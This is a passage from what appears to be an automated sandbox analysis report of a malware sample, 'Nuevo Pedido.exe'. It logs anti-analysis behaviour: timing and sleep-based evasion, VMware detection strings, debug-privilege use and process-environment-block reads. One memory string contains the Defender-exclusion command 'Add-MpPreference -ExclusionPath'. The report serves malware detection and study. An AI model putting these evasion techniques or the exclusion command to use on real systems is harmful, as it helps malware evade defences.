            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -240000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6404Thread sleep count: 834 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6404Thread sleep count: 1723 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6324Thread sleep time: -32847s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239717s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239499s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239139s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238904s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238561s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238452s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238046s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -237796s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -237437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -237250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -236890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -236781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6348Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 6388Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exe TID: 4140Thread sleep time: -34000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004088D0 rdtsc 3_2_004088D0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 240000Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239843Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239717Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239609Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239499Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239390Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239250Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239139Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239015Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238904Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238781Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238671Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238561Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238452Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238343Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238046Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 237796Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 237437Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 237250Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 236890Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 236781Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeWindow / User API: threadDelayed 834Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeWindow / User API: threadDelayed 1723Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 32847Jump to behavior
            Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000005.00000000.290480181.000000000891C000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
            Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000005.00000000.290480181.000000000891C000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp | Binary or memory string: vmware
            Source: explorer.exe, 00000005.00000000.290974701.0000000008BB0000.00000004.00000001.sdmp | Binary or memory string: E#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
            Source: explorer.exe, 00000005.00000000.279912891.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
            Source: explorer.exe, 00000005.00000000.251514435.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
            Source: explorer.exe, 00000005.00000000.246577528.00000000053C4000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
            Source: explorer.exe, 00000005.00000000.251514435.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
            Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_004088D0 rdtsc 3_2_004088D0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\cscript.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E8E00 mov eax, dword ptr fs:[00000030h]3_2_019E8E00
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71608 mov eax, dword ptr fs:[00000030h]3_2_01A71608
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BE620 mov eax, dword ptr fs:[00000030h]3_2_019BE620
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]3_2_019C7E41
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]3_2_019C7E41
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]3_2_019C7E41
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]3_2_019C7E41
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]3_2_019C7E41
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]3_2_019C7E41
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7AE44 mov eax, dword ptr fs:[00000030h]3_2_01A7AE44
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7AE44 mov eax, dword ptr fs:[00000030h]3_2_01A7AE44
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h]3_2_019DAE73
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h]3_2_019DAE73
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h]3_2_019DAE73
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h]3_2_019DAE73
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h]3_2_019DAE73
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C766D mov eax, dword ptr fs:[00000030h]3_2_019C766D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479746D mov eax, dword ptr fs:[00000030h]16_2_0479746D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA44B mov eax, dword ptr fs:[00000030h]16_2_047AA44B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04848CD6 mov eax, dword ptr fs:[00000030h]16_2_04848CD6
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047ABC2C mov eax, dword ptr fs:[00000030h]16_2_047ABC2C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6C0A mov eax, dword ptr fs:[00000030h]16_2_047F6C0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6C0A mov eax, dword ptr fs:[00000030h]16_2_047F6C0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6C0A mov eax, dword ptr fs:[00000030h]16_2_047F6C0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6C0A mov eax, dword ptr fs:[00000030h]16_2_047F6C0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048314FB mov eax, dword ptr fs:[00000030h]16_2_048314FB
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]16_2_04831C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0484740D mov eax, dword ptr fs:[00000030h]16_2_0484740D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0484740D mov eax, dword ptr fs:[00000030h]16_2_0484740D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0484740D mov eax, dword ptr fs:[00000030h]16_2_0484740D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6CF0 mov eax, dword ptr fs:[00000030h]16_2_047F6CF0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6CF0 mov eax, dword ptr fs:[00000030h]16_2_047F6CF0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6CF0 mov eax, dword ptr fs:[00000030h]16_2_047F6CF0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480C450 mov eax, dword ptr fs:[00000030h]16_2_0480C450
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480C450 mov eax, dword ptr fs:[00000030h]16_2_0480C450
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478849B mov eax, dword ptr fs:[00000030h]16_2_0478849B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479C577 mov eax, dword ptr fs:[00000030h]16_2_0479C577
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479C577 mov eax, dword ptr fs:[00000030h]16_2_0479C577
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048405AC mov eax, dword ptr fs:[00000030h]16_2_048405AC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048405AC mov eax, dword ptr fs:[00000030h]16_2_048405AC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04797D50 mov eax, dword ptr fs:[00000030h]16_2_04797D50
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B3D43 mov eax, dword ptr fs:[00000030h]16_2_047B3D43
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F3540 mov eax, dword ptr fs:[00000030h]16_2_047F3540
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A4D3B mov eax, dword ptr fs:[00000030h]16_2_047A4D3B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A4D3B mov eax, dword ptr fs:[00000030h]16_2_047A4D3B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A4D3B mov eax, dword ptr fs:[00000030h]16_2_047A4D3B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477AD30 mov eax, dword ptr fs:[00000030h]16_2_0477AD30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047FA537 mov eax, dword ptr fs:[00000030h]16_2_047FA537
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]16_2_04783D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483FDE2 mov eax, dword ptr fs:[00000030h]16_2_0483FDE2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483FDE2 mov eax, dword ptr fs:[00000030h]16_2_0483FDE2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483FDE2 mov eax, dword ptr fs:[00000030h]16_2_0483FDE2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483FDE2 mov eax, dword ptr fs:[00000030h]16_2_0483FDE2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04828DF1 mov eax, dword ptr fs:[00000030h]16_2_04828DF1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478D5E0 mov eax, dword ptr fs:[00000030h]16_2_0478D5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478D5E0 mov eax, dword ptr fs:[00000030h]16_2_0478D5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04848D34 mov eax, dword ptr fs:[00000030h]16_2_04848D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h]16_2_047F6DC9
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h]16_2_047F6DC9
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h]16_2_047F6DC9
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov ecx, dword ptr fs:[00000030h]16_2_047F6DC9
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h]16_2_047F6DC9
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h]16_2_047F6DC9
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483E539 mov eax, dword ptr fs:[00000030h]16_2_0483E539
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A1DB5 mov eax, dword ptr fs:[00000030h]16_2_047A1DB5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A1DB5 mov eax, dword ptr fs:[00000030h]16_2_047A1DB5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A1DB5 mov eax, dword ptr fs:[00000030h]16_2_047A1DB5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A35A1 mov eax, dword ptr fs:[00000030h]16_2_047A35A1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AFD9B mov eax, dword ptr fs:[00000030h]16_2_047AFD9B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AFD9B mov eax, dword ptr fs:[00000030h]16_2_047AFD9B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2581 mov eax, dword ptr fs:[00000030h]16_2_047A2581
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2581 mov eax, dword ptr fs:[00000030h]16_2_047A2581
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2581 mov eax, dword ptr fs:[00000030h]16_2_047A2581
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2581 mov eax, dword ptr fs:[00000030h]16_2_047A2581
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h]16_2_04772D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h]16_2_04772D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h]16_2_04772D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h]16_2_04772D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h]16_2_04772D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480FE87 mov eax, dword ptr fs:[00000030h]16_2_0480FE87
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h]16_2_0479AE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h]16_2_0479AE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h]16_2_0479AE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h]16_2_0479AE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h]16_2_0479AE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478766D mov eax, dword ptr fs:[00000030h]16_2_0478766D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04840EA5 mov eax, dword ptr fs:[00000030h]16_2_04840EA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04840EA5 mov eax, dword ptr fs:[00000030h]16_2_04840EA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04840EA5 mov eax, dword ptr fs:[00000030h]16_2_04840EA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]16_2_04787E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]16_2_04787E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]16_2_04787E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]16_2_04787E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]16_2_04787E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]16_2_04787E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0482FEC0 mov eax, dword ptr fs:[00000030h]16_2_0482FEC0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04848ED6 mov eax, dword ptr fs:[00000030h]16_2_04848ED6
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477E620 mov eax, dword ptr fs:[00000030h]16_2_0477E620
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA61C mov eax, dword ptr fs:[00000030h]16_2_047AA61C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA61C mov eax, dword ptr fs:[00000030h]16_2_047AA61C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477C600 mov eax, dword ptr fs:[00000030h]16_2_0477C600
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477C600 mov eax, dword ptr fs:[00000030h]16_2_0477C600
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477C600 mov eax, dword ptr fs:[00000030h]16_2_0477C600
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A8E00 mov eax, dword ptr fs:[00000030h]16_2_047A8E00
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831608 mov eax, dword ptr fs:[00000030h]16_2_04831608
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A16E0 mov ecx, dword ptr fs:[00000030h]16_2_047A16E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047876E2 mov eax, dword ptr fs:[00000030h]16_2_047876E2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A36CC mov eax, dword ptr fs:[00000030h]16_2_047A36CC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B8EC7 mov eax, dword ptr fs:[00000030h]16_2_047B8EC7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0482FE3F mov eax, dword ptr fs:[00000030h]16_2_0482FE3F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483AE44 mov eax, dword ptr fs:[00000030h]16_2_0483AE44
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483AE44 mov eax, dword ptr fs:[00000030h]16_2_0483AE44
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F46A7 mov eax, dword ptr fs:[00000030h]16_2_047F46A7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478FF60 mov eax, dword ptr fs:[00000030h]16_2_0478FF60
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478EF40 mov eax, dword ptr fs:[00000030h]16_2_0478EF40
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AE730 mov eax, dword ptr fs:[00000030h]16_2_047AE730
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04774F2E mov eax, dword ptr fs:[00000030h]16_2_04774F2E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04774F2E mov eax, dword ptr fs:[00000030h]16_2_04774F2E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479F716 mov eax, dword ptr fs:[00000030h]16_2_0479F716
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA70E mov eax, dword ptr fs:[00000030h]16_2_047AA70E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA70E mov eax, dword ptr fs:[00000030h]16_2_047AA70E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0484070D mov eax, dword ptr fs:[00000030h]16_2_0484070D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0484070D mov eax, dword ptr fs:[00000030h]16_2_0484070D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B37F5 mov eax, dword ptr fs:[00000030h]16_2_047B37F5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480FF10 mov eax, dword ptr fs:[00000030h]16_2_0480FF10
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480FF10 mov eax, dword ptr fs:[00000030h]16_2_0480FF10
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7794 mov eax, dword ptr fs:[00000030h]16_2_047F7794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7794 mov eax, dword ptr fs:[00000030h]16_2_047F7794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7794 mov eax, dword ptr fs:[00000030h]16_2_047F7794
